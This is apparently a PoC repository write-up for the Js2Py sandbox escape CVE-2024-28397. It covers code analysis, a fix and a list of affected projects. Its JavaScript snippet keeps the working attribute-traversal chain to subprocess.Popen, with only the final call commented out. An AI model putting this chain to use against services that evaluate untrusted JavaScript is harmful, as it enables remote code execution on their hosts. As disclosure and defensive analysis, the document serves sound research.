PoC details: f52f6b942708c005a5fcd46c98eeacc5790f6cbf

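Related vulnerability
Title: Js2Py security vulnerability (CVE-2024-28397)
Description: Js2Py is a Python library that translates JavaScript into Python code. Js2Py 0.74 and earlier contain a vulnerability in the component js2py.disable_pyimport() that allows an attacker to execute arbitrary code via a crafted API call.
Introduction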
# CVE-2024-28397-js2py-Sandbox-Escape

# js2py Vulnerability Analysis

## Introduction


`js2py` is a popular Python package that evaluates JavaScript code inside the Python interpreter. Various web scrapers use it to parse JavaScript found on websites.

The implementation of a global variable inside `js2py` contains a vulnerability that lets an attacker obtain a reference to a Python object in the `js2py` environment. With that reference, the attacker can escape the JS environment and execute arbitrary commands on the host.

Normally, a user would call `js2py.disable_pyimport()` to stop JavaScript code from escaping the `js2py` environment. But with this vulnerability, an attacker can evade this restriction and execute any command on the target host.

A threat actor can host a website containing a malicious JavaScript file, or send a malicious script through an HTTP API, for the victim to parse. Once the victim evaluates the script, the actor achieves remote code execution by running arbitrary shell commands on the target host.

---

## Preface

`js2py` is a Python library that parses and executes JS code in a native Python environment. Crawlers commonly use it to evaluate JS code fetched from the web, thereby simulating a browser environment.

However, `js2py` has a feature that is extremely dangerous for crawlers: it supports importing and using Python packages from JS. In other words, `js2py` lets JS code drive Python libraries and interact directly with the Python environment. Because of this, a technique similar to Jinja SSTI applies: starting from any Python object exposed in the `js2py` environment, we can walk its attributes to find the `subprocess.Popen` class and achieve RCE.

Moreover, `js2py` dates from the Python 2 era, is widely used, and has long been unmaintained, so it should be relatively easy to analyze.

---

## Code Analysis

### JS Code to Python Code

Stepping through with a debugger shows that the JS code is actually translated in the `Eval` function of `host/jseval.py`. A breakpoint inside that function reveals the Python code that `js2py` generates.

For example, this piece of JS code:

```js
let a = 114
console.log(a)
```

is ultimately translated into this piece of Python code:

```python
var.registers(['a'])
var.put('a', Js(114.0))
EVAL_RESULT = (var.get('console').callprop('log', var.get('a')))
```

This shows that JS-level variables are all stored in the Python variable `var`, and that every JS-level value is wrapped in a `PyJs` class (`Js` here is actually a function, explained later). Function calls also go through `callprop`. Under normal circumstances, JS code cannot touch raw Python objects.

While reading the code, I noticed that the author relies heavily on string concatenation to build the final Python code. That raises the question of whether crafted JS could produce malformed Python and thereby inject arbitrary Python code. This path looked much harder than the one described later, so I did not explore it further.

---

### Python Data to JS Data

To obtain a Python object and achieve RCE, the first thing to examine is how Python objects are converted into `PyJs` objects.

The `Js` function is implemented in `base.py`. It converts an incoming Python value into the corresponding `PyJs` value so that JS code can manipulate it.

```python
def Js(val, Clamped=False):
    '''Converts Py type to PyJs type'''
    if isinstance(val, PyJs):
        return val
    elif val is None:
        return undefined
    elif isinstance(val, basestring):
        return PyJsString(val, StringPrototype)
    elif isinstance(val, bool):
        return true if val else false
    elif isinstance(val, float) or isinstance(val, int) or isinstance(
            val, long) or (NUMPY_AVAILABLE and isinstance(
                val,
                (numpy.int8, numpy.uint8, numpy.int16, numpy.uint16,
                 numpy.int32, numpy.uint32, numpy.float32, numpy.float64))):
        # This is supposed to speed things up. may not be the case
        if val in NUM_BANK:
            return NUM_BANK[val]
        return PyJsNumber(float(val), NumberPrototype)
    ... # several lines omitted here
    else:  # try to convert to js object
        return py_wrap(val)
```

Python's basic data types such as bool, float, and list are converted into dedicated `PyJs` classes, while every other type is handled by `py_wrap` and ends up as a `PyObjectWrapper`.

Ordinary `PyJs` classes represent numbers, booleans, and other common data, while `PyObjectWrapper` represents special data such as Python modules. So as long as we can obtain a value of type `PyObjectWrapper`, we can use attribute access in the style of Jinja SSTI to achieve RCE.

Normally, a `PyObjectWrapper` can only be obtained when importing Python packages is enabled. But `js2py` has long been unmaintained and did not carefully account for the differences between Python 2 and Python 3, and that oversight is what ultimately produced the sandbox escape.

As an aside, while reading the implementation of `PyJs`, I came across these lines:
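The dispatch described above can be illustrated with a toy converter. This is a minimal sketch, not `js2py` code: `ToyJsNumber`, `ToyJsString`, `ToyObjectWrapper`, and `to_js` are hypothetical names invented for illustration, and the real `Js` function handles many more types.

```python
class ToyJsNumber:
    """Hypothetical stand-in for a dedicated PyJs number class."""
    def __init__(self, value):
        self.value = float(value)


class ToyJsString:
    """Hypothetical stand-in for a dedicated PyJs string class."""
    def __init__(self, value):
        self.value = value


class ToyObjectWrapper:
    """Hypothetical stand-in for the catch-all wrapper.

    Unlike the classes above, it keeps a reference to the raw Python object.
    """
    def __init__(self, obj):
        self.obj = obj


def to_js(val):
    """Convert a Python value to a toy JS value (illustrative only)."""
    if isinstance(val, (int, float)):
        return ToyJsNumber(val)
    if isinstance(val, str):
        return ToyJsString(val)
    # Anything the converter does not recognize falls through to the wrapper.
    return ToyObjectWrapper(val)


for sample in (114, "text", {}.keys()):
    print(type(sample).__name__, "->", type(to_js(sample)).__name__)
```

The point of the sketch is the final fallthrough: any value whose type the converter does not list explicitly reaches the wrapper with the original Python object still attached.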

```python
if six.PY3:
    PyJs.__hash__ = PyJs._fuck_python3
    PyJs.__truediv__ = PyJs.__div__
```

Evidently, the author is no fan of Python 3.

---

### JS Function Implementation

Besides translating JS code into Python code, `js2py` provides built-in objects such as `console` and `Object` so that JS code can run normally.

Our ultimate goal is to bypass the `pyimport` restriction and obtain a `PyObjectWrapper` object. As the analysis above shows, the only way to conjure a `PyObjectWrapper` out of nothing is to find a built-in object whose implementation leaks one.

So we start by scanning the implementation of the built-in objects. `constructors/jsobject.py` implements the functions of the `Object` object, including commonly used ones such as `Object.keys`.

Among them is this function:

```python
def getOwnPropertyNames(obj):
    if not obj.is_object():
        raise MakeError(
            'TypeError',
            'Object.getOwnPropertyDescriptor called on non-object')
    return obj.own.keys()
```

`js2py` uses a `dict` to represent JS objects, so the `keys()` call here is the Python dictionary method. In Python 2, `dict.keys()` returns a list, while in Python 3 it returns a `dict_keys` view. Because `dict_keys` is not one of the types that `Js` handles explicitly, it falls through to `py_wrap` and becomes a `PyObjectWrapper`, which is exactly what we need to achieve RCE.
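The Python 2 versus Python 3 difference can be checked without `js2py` at all. The following is a small sketch using a plain dictionary; the variable `own` is only a stand-in for the per-object property dictionary mentioned above.

```python
import sys

# Stand-in for the dictionary that holds a JS object's own properties.
own = {"a": 1, "b": 2}

keys = own.keys()

# On Python 3 this is a dict_keys view, not a list.
print("Python", sys.version_info.major, "returns", type(keys).__name__)

is_plain_list = isinstance(keys, list)

# list(...) copies the view into an ordinary list of property names.
as_list = list(keys)
print("is list:", is_plain_list, "| converted:", as_list)
```

On Python 3, `is_plain_list` is `False`, so a converter that only special-cases `list` will not recognize the value.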

---

## Achieving RCE

First verify whether `getOwnPropertyNames` can obtain a `PyObjectWrapper`:

```python
import js2py

code = """
let a = Object.getOwnPropertyNames({})
console.log(a)
"""

js2py.eval_js(code)
```

This prints `PyObjectWrapper(dict_keys([]))`, which confirms that it can.

From this object we can obtain the `__getattribute__` function, and from there RCE is straightforward. The original PoC made this step more complicated than necessary; `__class__.__base__` alone is enough to reach `__getattribute__`.

Using `__getattribute__`, we obtain the `object` class and then write a recursive function that can find any class in any loaded module. For RCE, the class we look for is `subprocess.Popen`.

> **NOTE (sanitized):** The code snippet below is shown for educational and research purposes. **It has been sanitized** to avoid facilitating misuse: sensitive shell commands and direct system execution have been replaced with placeholders. Do not run this against production or unpatched systems.

```python
import js2py

code = """
let cmd = "DUMMY_CMD"  // replace with safe test command in a lab (e.g., 'echo test')
let a = Object.getOwnPropertyNames({}).__class__.__base__.__getattribute__
let obj = a(a(a,"__class__"), "__base__")
function findpopen(o) {
    let result;
    for(let i in o.__subclasses__()) {
        let item = o.__subclasses__()[i]
        if(item.__module__ == "subprocess" && item.__name__ == "Popen") {
            return item
        }
        if(item.__name__ != "type" && (result = findpopen(item))) {
            return result
        }
    }
}
// The next call would invoke subprocess.Popen with arguments — in the sanitized version
// we replace the actual system invocation with a placeholder for safety reasons.
// findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate()
console.log("[SANITIZED] PoC execution skipped to avoid misuse")
result
"""

# Note: js2py.eval_js(code) intentionally omitted to avoid running exploit code in this repository.
```

---

## Details of the vulnerability

* **Version number of the affected component:**

  * js2py up to and including 0.74 (the latest release at the time of writing), running under Python 3
* **Affected products:**

  * [pyload/pyload](https://github.com/pyload/pyload)
  * [VeNoMouS/cloudscraper](https://github.com/VeNoMouS/cloudscraper) (uses js2py as an optional 'js interpreter')
  * [dipu-bd/lightnovel-crawler](https://github.com/dipu-bd/lightnovel-crawler)
* **Steps to reproduce (lab only):**

  * Install Python3 < 3.12 (js2py currently doesn't support Python 3.12).
  * Run `pip install js2py` to install `js2py`, then execute a **sanitized** PoC script in an isolated lab environment. The original PoC attempted to run commands such as `head -n 1 /etc/passwd` and to launch a calculator; in this repo those are replaced with safe placeholders.
  * If the vulnerability exists, the researcher will observe that a `PyObjectWrapper` can be obtained from `Object.getOwnPropertyNames({})`, enabling attribute traversal to reach Python internals.
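For defenders, a quick inventory check can flag environments that match the affected range. The sketch below is an assumption-laden helper, not part of the original repository: the function names are hypothetical, the version threshold is taken from the "<=0.74" statement above, and it assumes `importlib.metadata` can resolve the distribution under the name `js2py`.

```python
import re
from importlib import metadata

# Taken from the advisory text above: js2py <= 0.74 is affected.
LAST_AFFECTED = (0, 74)


def installed_js2py_version():
    """Return the installed js2py version string, or None if not installed."""
    try:
        return metadata.version("js2py")
    except metadata.PackageNotFoundError:
        return None


def may_be_affected(version_text):
    """Compare the first two numeric components against LAST_AFFECTED."""
    numbers = re.findall(r"\d+", version_text)
    if len(numbers) < 2:
        # Unknown version format: be conservative and flag it.
        return True
    return (int(numbers[0]), int(numbers[1])) <= LAST_AFFECTED


version = installed_js2py_version()
if version is None:
    print("js2py is not installed in this environment")
elif may_be_affected(version):
    print("js2py", version, "is within the affected range; review its usage")
else:
    print("js2py", version, "is newer than the affected range")
```

A version match only indicates exposure when untrusted JavaScript is evaluated under Python 3, so treat the result as a prompt for review rather than a verdict.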

---

## Fix

Since the problem lies in the `getOwnPropertyNames` function, converting the `dict_keys` it returns into a normal list fixes the issue. A suggested patch is to wrap `obj.own.keys()` with `list(...)` before returning.
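The suggested change can be sketched as follows. To keep the example self-contained, `FakeJsObject` is a hypothetical stand-in for a `js2py` object and a plain `TypeError` replaces the library's `MakeError` call; only the `list(...)` wrapping reflects the fix described above.

```python
class FakeJsObject:
    """Hypothetical stand-in for a js2py object; `own` holds its properties."""

    def __init__(self, **props):
        self.own = dict(props)

    def is_object(self):
        return True


def get_own_property_names_patched(obj):
    """Sketch of the patched function: return a list, not a dict_keys view."""
    if not obj.is_object():
        # The real code raises through MakeError; TypeError is used here
        # only so the sketch runs without js2py installed.
        raise TypeError("getOwnPropertyNames called on non-object")
    # list(...) materializes the view, so the converter sees a type it
    # handles explicitly instead of falling through to the generic wrapper.
    return list(obj.own.keys())


names = get_own_property_names_patched(FakeJsObject(x=1, y=2))
print(type(names).__name__, names)
```

Returning a plain list restores the Python 2 behavior that the rest of the library was written against.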

---

## Disclaimer

This repository is for educational and defensive research purposes only. Do not use any of the information or code here to attack systems without explicit authorization. The PoC snippets have been sanitized to avoid facilitating misuse.

---

*Compiled and translated for research & defensive use.*
File snapshot

[4.0K] /data/pocs/f52f6b942708c005a5fcd46c98eeacc5790f6cbf
├── [1.0K] Acknowledgements.md
├── [7.3K] analysis.md
├── [ 464] fix.py
├── [ 34K] LICENSE
├── [ 403] patch.txt
├── [1.2K] Proof of Concept.py
└── [ 10K] README.md

0 directories, 7 files